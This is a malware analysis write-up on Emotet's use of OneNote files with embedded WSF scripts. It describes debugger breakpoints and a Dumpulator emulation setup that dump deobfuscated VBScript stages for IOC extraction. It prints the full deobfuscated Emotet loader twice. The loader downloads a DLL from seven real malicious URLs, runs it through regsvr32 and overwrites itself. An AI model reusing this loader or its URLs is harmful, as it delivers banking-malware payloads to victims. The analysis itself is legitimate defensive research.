Overview

Recently Emotet has been using OneNote files as their pre-binary dropper/downloader. The delivery chain appears to be...

  • OneNote
  • Embeded WSF file
  • Download DLL (Emotet first stage)

Our goal will be to construct a full static IOC extraction tool for these files!

Sample

1c3a7f886a544fc56e91b7232402a1d86282165e2699b7bf36e2b1781cb2adc2 Malshare

References

OneNote File Format

  • OneNote files use the file extension .one
  • These documents can contain other files (similar to a .doc file or .xls)
    • Not sure if there are limits to the types of files that can be included but .wsf files can be included
  • The current method used to trick users into executing these embedded files is to place them "under" an image that request the user double click for some reason... the double click will then be passed on to the embedded file.
    • Because these files are launched using a "double click" they must have a valid file extension (note for defenders)

Analysis

  • Extract all embedded files from OneNote document
  • Search for executable file extensions on extracted files
  • Triage these files

OneNote Triage

  • inside of onenote is a .wsf file which contains an obfuscated script
  • replacing the execute command with a simple file print we get the deobfuscated script
urlcount=1
set fsobject=createobject("scripting.filesystemobject")
currentdir=fsobject.getparentfoldername(wscript.scriptfullname)
set request=createobject("winhttp.winhttprequest.5.1")
set file=wscript.createobject("shell.application")
set strout=createobject("adodb.stream")
useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"
ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
set triplett=createobject("wscript.shell")
url1 = "https://penshorn.org/admin/Ses8712iGR8du/"
url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"
url3 = "https://www.gomespontes.com.br/logs/pd/"
url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"
url5 = "http://ozmeydan.com/cekici/9/"
url6 = "http://softwareulike.com/cWIYxWMPkK/"
url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"
do
call dow
loop  while urlcount<8
public function dow()
on error resume next
select case urlcount
case 1
downstr=url1
case 2
downstr=url2
case 3
downstr=url3
case 4
downstr=url4
case 5
downstr=url5
case 6
downstr=url6
case 7
downstr=url7
end select
request.open "get",downstr,false
request.send
If Err.Number<>0 then
urlcount=urlcount+1
else
strout.open
strout.type=1
if vare=0 then
cad=1
else
far=2
end if
strout.write (request.responsebody)
if roum=0 then
sio=sio+1
else
end if
strout.savetofile pat3
strout.close
armour = "samcom."
set fsobject=createobject("scripting.filesystemobject")
Set f = fsobject.GetFile(pat3)
GetFileSize = clng(f.size/1024)
If GetFileSize > 150 Then
call roize
urlcount = 8
else
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
urlcount=urlcount+1
end if
end if
end function
public function roize
if derti=0 then
sem=sem+1
else
end if
urlcount = 8
triplett.run (loiu),0,true
cor = "samo"
set fsobject=createobject("scripting.filesystemobject")
set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")
textstream.write ("badum tss")
if rotate = 12 then
sable = 54 + 22
else
routtt = "carry"
end if
end function

Emulation?

Instead of running this live and modifying the script, can we get away with emulating wscript.exe and running the script in an emulator?

Some Thoughts on Emulation

  • We want to dump early enough that we can modify the script code before it is parsed
  • We want to dump late enough that most of the setup is done and we don't have to implement much in dumpulator
  • Currently we are having some issues with the sweet spot for a dump because wscript -> scobj and scobj uses an abstraction to implement the parser
  • When we dump before the parser we still have some thread stuff causing issues (maybe not fixable???)
  • TODO: look into vbscript (without wscript wrapper) is it simpler??

Taking A Closer Look a The Scripting Engine

We want a way to run vbs/wsf scripts and dump each deobfuscated script stage (or atleast each stage assuming it will be less obfuscated than the last).

We know that wscript

References

Background

  • For JScript the solution is much simpler as we can rely on the underlying javascript NODE engine to do the heavy lifting and implement the JScript specific objects/calls malware-jail wscript emulator (jscript only)
  • For VBscript there is no good solution as there is no "basic" script engine that we can rely on.
  • For VBscript we are going to try to doe this dynamically
    • Instrument the wscript.exe binary and take a look at what function are used to 'execute' new scripts dynamically
    • We can also take a look at the AMSI events and see if this is done for us?

cscript.exe

We are using cscript to launch our test VBS script with the following setup (32bit for ease of debugging).

"C:\Windows\SysWOW64\cscript.exe" c:\users\admin\desktop\test.vbs

We are starting with .vbs instead of .wsf to eliminate any additional complexity (wsf is sent to an XML parser first for the header, etc.)

Script State

From a high level we can start by breaking on this (callback?) CScriptingEngine::OnStateChange(enum tagSCRIPTSTATE)

enum tagSCRIPTSTATE
{
  SCRIPTSTATE_UNINITIALIZED = 0x0,
  SCRIPTSTATE_INITIALIZED = 0x5,
  SCRIPTSTATE_STARTED = 0x1,
  SCRIPTSTATE_CONNECTED = 0x2,
  SCRIPTSTATE_DISCONNECTED = 0x3,
  SCRIPTSTATE_CLOSED = 0x4,
};

This gives us a convenient place to break and investigate the script before it has been passed to the script engine.

vbscript.dll

Our first focus in the actual scripting engine is the Antimalware Script Interface (AMSI) component which parses the script before it is actually run and sends events to AMSI.

JAmsiProcessor

JAmsi::JAmsiProcessor(struct IDispatch *, long, struct tagDISPPARAMS *, class CSession *)

The JAmsiProcessor is actually called for each "execution" of a script (so keywords within a running script will trigger it). The main purpose appears to be to parse the script into command tokens then hash the token (ex. echo) with a version of CRC32 (seed=0xffffffff, inverted result) and then compare the hashes against known values used to trigger AMSI events.

Script Excution

The following is an example call stack for an executed script.

COleScript::ExecutePendingScripts
CSession::Execute 
CScriptEntryPoint::Call  
CScriptRuntime::Run 
CScriptRuntime::RunNoEH

Following the flow (thank you @mishap ...

VbsExecute->rtEval and then it recurses back into CScriptEntryPoint::Cal

CSession::Execute       | 
     CScriptEntryPoint::Call |--- Setting up script
     CScriptRuntime::Run     | 
     -------------------------
     CScriptRuntime::RunNoEH |--- Parses over the script
  -->VbsExecute              |--- Hit execute keyword
  |  rtEval                  |--- Evaluates execute args
  |  CScriptEntryPoint::Call |
  |  CScriptRuntime::Run     |--- Recursive call back to parser   
  ---CScriptRuntime::RunNoEH | 
     -------------------------

Based on this we can break on VbsExecute and observe any scripts that are being executed.

struct IEntryPoint *__stdcall VbsExecute(struct VAR *a1, int a2, execute_data *arg_data)

We have not fully reversed the structure of the arguments but the following is a start (it is wrong in some cases!!)

struct execute_data
{
  DWORD d0;
  DWORD d1;
  wchar_t *code;
};

** This is the x64dbg log statement we were using for a breakpoint on VbsExecute

{utf16@[[esp+0xc] + 8]}

Instrumenting VBscript

Also thanks to @mishap we dug further and discovered that rtEval is called with the contents of the script to be executed so we can break on this instead and pull the script (wide string) from ECX (fastcall).

struct IEntryPoint *__fastcall rtEval(unsigned __int16 *a1, struct IEntryPoint *a2, int a3, int a4)

The following is all we need in x64dbg to log all executed scripts with a breakpoint on this function {utf16@ecx}

Dumpulator Emulation!

Now that we have a better place to dump we can try this again.

  • Run a test script that includes execute until a bp on rtEval is hit
  • Dump
  • Load in Dumpulator
  • ECX contains a pointer to the script (wide string)
  • Place Dumpulator bp on rtEval
  • Replace this script with the target script in dumpulator and run
  • When the Dumpulotor rtEval bp is hit it means that another script is attempting to execute (pointed to by ECX)

We still ran into a few issues but managed to work passed them...

Dumpulator (Unicorn) AVX Support

There is no support for AVX in Unicorn so we had to use a VM with AVX instructions disabled to take our dump for Dumpulator.

Syscalls!!

Inside of the rtEval function the AMSI functions are called which in turn call into the Defender DLL. This causes all kinds of Syscall activity that we don't want to implement in Dumpulator so our solution was to just NOP out the AMSI calls. (Image and implementation courtesy of @mishap)

Dumpulator Alloc Bug?

There was some sort of issue with page alignment in dumpulator's memory manager so we just forced it in ZwAllocateVirtualMemory.

base = round_to_pages(base)

This will be opened as as a proper issue...

Limitations

This is just a proof of concept.

  • We only handle the execute method from VBS other execution methods may need additional hooks
  • We also don't handle any actual script execution (ie. calls to Windows APIs from the script)
  • We only deobfuscate the first layer then end
  • Currently we don't exit cleanly at the end of the script (it runs till failure)

Script Prep

Because we are effectively treating our target script as through it was a script passed to the execute command as a string it must be encoded as UTF-16 and it cannot contain any comments.

script = open('/tmp/bad.vbs','rb').read()
out = b''
for c in script.split(b'\n'):
    if c[0] == ord(b"'"):
        continue
    out += c + b'\n'

tmp_bytes = [] 

for c in out:
    tmp_bytes.append(c)
    tmp_bytes.append(0)

script_bytes = bytes(tmp_bytes) + b'\x00\x00'

Dumpulator Run

from dataclasses import dataclass
from typing import Callable, Dict, Union, Optional

from dumpulator import Dumpulator
from dumpulator.dumpulator import ExceptionInfo, ExceptionType

seen = False

@dataclass
class BreakpointInfo:
    address: int
    original: bytes
    callback: Callable[[], None]

class MyDumpulator(Dumpulator):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        self._breakpoints: Dict[int, BreakpointInfo] = {}
        self._breakpoint_step: Optional[BreakpointInfo] = None
        self.set_exception_hook(self.exception_hook)

    def set_breakpoint(self, address: Union[int, str], callback: Callable[[], None]):
        if isinstance(address, str):
            module_name, export_name = address.split(":")
            module = self.modules.find(module_name)
            if module is None:
                raise KeyError(f"Module '{module_name}' not found")
            export = module.find_export(export_name)
            if export is None:
                raise KeyError(f"Export '{export_name}' not found in module '{module_name}'")
            assert export.forward is None
            address: int = export.address
        assert address not in self._breakpoints
        self._breakpoints[address] = BreakpointInfo(address, self.read(address, 1), callback)
        self.write(address, b"\xCC")

    def remove_breakpoint(self, address: int):
        assert address in self._breakpoints
        bp = self._breakpoints[address]
        self.write(bp.address, bp.original)
        del self._breakpoints[address]

    def exception_hook(self, exception: ExceptionInfo) -> Optional[int]:
        if exception.type == ExceptionType.Interrupt:
            if exception.interrupt_number == 3:  # int3
                # Find the breakpoint
                bp = self._breakpoints.get(self.regs.cip - 1)
                if bp is None:
                    print(f"Unexpected int3 at {hex(self.regs.cip)}, ignoring")
                    return None
                print(f"Reached breakpoint at {hex(bp.address)}")

                # Execute the breakpoint callback
                self.regs.cip -= 1
                bp.callback()

                # Restore the breakpoint if it wasn't removed
                if bp.address in self._breakpoints:
                    print('Restoring breakpoint')
                    self.write(bp.address, bp.original)
                    self.regs.eflags |= 0x100  # trap flag
                    self._breakpoint_step = bp

                # Resume execution at the CIP (the callback might change it)
                return self.regs.cip
            elif exception.interrupt_number == 1:  # single step
                if self._breakpoint_step is None:
                    print(f"Unexpected single step at {hex(self.regs.cip)}")
                    return None

                print("Single stepping after breakpoint")
                self.regs.eflags &= ~0x100  # remove trap flag
                self.write(self._breakpoint_step.address, b"\xCC")
                self._breakpoint_step = None
                return self.regs.cip

        # Let the original exception handler do this
        return None

    
    
    
@syscall
def ZwAllocateVirtualMemory(dp: Dumpulator,
                            ProcessHandle: Annotated[HANDLE, SAL("_In_")],
                            BaseAddress: Annotated[P[PVOID], SAL("_Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize))")],
                            ZeroBits: Annotated[ULONG_PTR, SAL("_In_")],
                            RegionSize: Annotated[P[SIZE_T], SAL("_Inout_")],
                            AllocationType: Annotated[ULONG, SAL("_In_")],
                            Protect: Annotated[ULONG, SAL("_In_")]
                            ):
    assert ZeroBits == 0
    assert ProcessHandle == dp.NtCurrentProcess()
    base = dp.read_ptr(BaseAddress.ptr)
    base = round_to_pages(base)
    assert base & 0xFFF == 0
    size = round_to_pages(dp.read_ptr(RegionSize.ptr))
    #assert size != 0
    protect = MemoryProtect(Protect)
    if AllocationType == MEM_COMMIT:
        if base == 0:
            base = dp.memory.find_free(size)
            dp.memory.reserve(base, size, protect)
            BaseAddress.write_ptr(base)
            RegionSize.write_ptr(size)
        #print(f"commit({hex(base)}[{hex(size)}], {protect})")
        dp.memory.commit(base, size, protect)
    elif AllocationType == MEM_RESERVE:
        if base == 0:
            base = dp.memory.find_free(size)
            BaseAddress.write_ptr(base)
            RegionSize.write_ptr(size)
        #print(f"reserve({hex(base)}[{hex(size)}], {protect})")
        dp.memory.reserve(base, size, protect)
    elif AllocationType == MEM_COMMIT | MEM_RESERVE:
        if base == 0:
            base = dp.memory.find_free(size)
            BaseAddress.write_ptr(base)
            RegionSize.write_ptr(size)
        #print(f"reserve+commit({hex(base)}[{hex(size)}], {protect})")
        dp.memory.reserve(base, size, protect)
        dp.memory.commit(base, size)
    else:
        raise NotImplementedError()
    return STATUS_SUCCESS


dp = MyDumpulator("/tmp/cscript_nopped.dmp", quiet=True)

def rteval_bp():
    global seen
    print("hit bp")
    #print(dp.read_str(dp.regs.ecx, encoding='utf-16'))
   

    if seen:
        print(seen)
        out = b''
        ptr = dp.regs.ecx
        c = 0
        while c < 100000000:
            c += 1
            ptr_byte = dp.read(ptr, 1)
            out += ptr_byte
            if ptr_byte == b'\x00':
                if dp.read(ptr+1, 1) == b'\x00':
                    break
            ptr += 1
        print("== SCRIPT ==")
        print(out.decode('utf-16').replace('\r','\n'))
        dp.remove_breakpoint(0x7021074D)
        dp.eip = 0x13371337
        dp.stop()
    else:
        print(seen)
        seen = True
        

dp.set_breakpoint(0x7021074D, rteval_bp)


ptr_script_bytes = dp.allocate(len(script_bytes),page_align = True)
dp.write(ptr_script_bytes, script_bytes)
                               
dp.regs.ecx = ptr_script_bytes

dp.write(dp.regs.ecx, script_bytes)



dp.start(dp.regs.cip, end=0x13371337)
         
         
         
         
interrupt 3 (#BP, Breakpoint), cip = 0x7021074e, cs = 0x23
Reached breakpoint at 0x7021074d
hit bp
False
Restoring breakpoint
interrupt 1 (#DB, Debug), cip = 0x7021074f, cs = 0x23
Single stepping after breakpoint
interrupt 3 (#BP, Breakpoint), cip = 0x7021074e, cs = 0x23
Reached breakpoint at 0x7021074d
hit bp
True
== SCRIPT ==
urlcount=1
set fsobject=createobject("scripting.filesystemobject")
currentdir=fsobject.getparentfoldername(wscript.scriptfullname)
set request=createobject("winhttp.winhttprequest.5.1")
set file=wscript.createobject("shell.application")
set strout=createobject("adodb.stream")
useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"
ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
set triplett=createobject("wscript.shell")
url1 = "https://penshorn.org/admin/Ses8712iGR8du/"
url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"
url3 = "https://www.gomespontes.com.br/logs/pd/"
url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"
url5 = "http://ozmeydan.com/cekici/9/"
url6 = "http://softwareulike.com/cWIYxWMPkK/"
url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"
do
call dow
loop  while urlcount<8
public function dow()
on error resume next
select case urlcount
case 1
downstr=url1
case 2
downstr=url2
case 3
downstr=url3
case 4
downstr=url4
case 5
downstr=url5
case 6
downstr=url6
case 7
downstr=url7
end select
request.open "get",downstr,false
request.send
If Err.Number<>0 then
urlcount=urlcount+1
else
strout.open
strout.type=1
if vare=0 then
cad=1
else
far=2
end if
strout.write (request.responsebody)
if roum=0 then
sio=sio+1
else
end if
strout.savetofile pat3
strout.close
armour = "samcom."
set fsobject=createobject("scripting.filesystemobject")
Set f = fsobject.GetFile(pat3)
GetFileSize = clng(f.size/1024)
If GetFileSize > 150 Then
call roize
urlcount = 8
else
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
urlcount=urlcount+1
end if
end if
end function
public function roize
if derti=0 then
sem=sem+1
else
end if
urlcount = 8
triplett.run (loiu),0,true
cor = "samo"
set fsobject=createobject("scripting.filesystemobject")
set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")
textstream.write ("badum tss")
if rotate = 12 then
sable = 54 + 22
else
routtt = "carry"
end if
end function

interrupt 3 (#BP, Breakpoint), cip = 0x7021074e, cs = 0x23
Unexpected int3 at 0x7021074e, ignoring
Exception thrown during syscall implementation, stopping emulation!
forced exit memory operation 21 of 0x4fe2[0x1] = 0x0
---------------------------------------------------------------------------
NotImplementedError                       Traceback (most recent call last)
<ipython-input-8-cb4a538155d4> in <module>
    170 
    171 
--> 172 dp.start(dp.regs.cip, end=0x13371337)
    173 
    174 

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/dumpulator/dumpulator.py in start(self, begin, end, count)
   1110             except UcError as err:
   1111                 if self.kill_me is not None and type(self.kill_me) is not UcError:
-> 1112                     raise self.kill_me
   1113                 if self._exception.type != ExceptionType.NoException:
   1114                     # Handle the exception outside of the except handler

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/unicorn/unicorn.py in wrapper(self, *args, **kwargs)
    390         """
    391         try:
--> 392             return func(self, *args, **kwargs)
    393         except Exception as e:
    394             # If multiple hooks raise exceptions, just use the first one

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/unicorn/unicorn.py in _hook_insn_syscall_cb(self, handle, user_data)
    713         # call user's callback with self object
    714         (cb, data) = self._callbacks[user_data]
--> 715         cb(self, data)
    716 
    717     @_catch_hook_exception

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/dumpulator/dumpulator.py in _hook_syscall(uc, dp)
   1619             except Exception as exc:
   1620                 dp.error(f"Exception thrown during syscall implementation, stopping emulation!")
-> 1621                 raise dp.raise_kill(exc) from None
   1622             finally:
   1623                 dp.sequence_id += 1

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/dumpulator/dumpulator.py in _hook_syscall(uc, dp)
   1601             dp.info(")")
   1602             try:
-> 1603                 status = syscall_impl(dp, *args)
   1604                 if isinstance(status, ExceptionInfo):
   1605                     print("context switch, stopping emulation")

~/.pyenv/versions/3.9.5/lib/python3.9/site-packages/dumpulator/ntsyscalls.py in ZwQueryInformationJobObject(dp, JobHandle, JobObjectInformationClass, JobObjectInformation, JobObjectInformationLength, ReturnLength)
   2972                                 ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
   2973                                 ):
-> 2974     raise NotImplementedError()
   2975 
   2976 @syscall

NotImplementedError: